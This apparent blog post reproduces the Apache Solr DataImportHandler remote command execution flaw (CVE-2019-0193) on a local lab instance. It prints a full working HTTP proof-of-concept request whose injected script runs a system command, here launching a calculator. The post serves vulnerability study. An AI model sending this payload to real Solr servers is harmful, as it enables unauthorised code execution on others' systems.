Apache Solr 远程命令执行漏洞(CVE-2019-0193)
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径!
1.漏洞描述
2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含脚本,因此,会存在远程代码执行漏洞。
2.影响范围
Apache Solr < 8.2.0
3.漏洞利用
(1)下载与启动
https://www-eu.apache.org/dist/lucene/solr/
使用清华大学镜像下载,速度很快:
http://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/7.7.2/solr-7.7.2.zip
下载解压后,进入此目录下的bin目录,启动solr命令: solr -e dih
停止solr命令:solr stop -all
(2)获取name信息
访问http://localhost:8983/solr/#/
通过接口来获取所有 core 信息,因为我们构造 payload 需要 name 信息。
http://127.0.0.1:8983/solr/admin/cores
(3)弹出计算器
在Burp中发送以下POC即可执行命令弹出计算器,如下所示:
POST /solr/atom/dataimport HTTP/1.1
Host: 127.0.0.1:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 492
Content-type: application/x-www-form-urlencoded
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=atom&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
相关文章
- apache 中 RewriteCond 介绍
- Apache Spark机器学习.2.2 数据清洗
- 《Apache Zookeeper 官方文档》ZooKeeper可插入式身份认证
- Apache Storm 官方文档 —— Trident State
- Apache Tomcat安全绕过漏洞(CVE-2018-1305)
- Apache 隐藏 index.php,如将 tp5.com/index.php/hello/123 变成 tp5.com/hello/123
- 漏洞复现----5、Apache Solr远程命令执行漏洞(CVE-2019-0193)
- 漏洞复现----8、Apache SSI远程命令执行
- 【漏洞通告】Apache Dubbo多个高危漏洞(CVE-2021-25641等)
- CVE-2020-17530: Apache Struts2 远程代码执行漏洞通告
- CVE-2020-17510: Apache Shiro 权限绕过漏洞通告
- CVE-2019-0230:Apache Struts2远程代码执行漏洞通告
- CVE-2020-9497/9498: Apache Guacamole 网关远程代码执行漏洞通告
- CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告
- CVE-2020-1947: Apache ShardingSphere&UI远程代码执行漏洞通告
- Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
- Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现 和处理
- linux Apache 日志配置
- How-to: Do Real-Time Log Analytics with Apache Kafka, Cloudera Search, and Hue
- Nginx和Apache共存环境下apache获得真实IP
- CentOS7下HTTP并发测试工具Apache Benchmark(AB)安装和使用
- apache开源项目--dbutils
- apache开源项目--ZooKeeper
- (CVE-2017-12629)Apache Solr RCE命令执行漏洞复现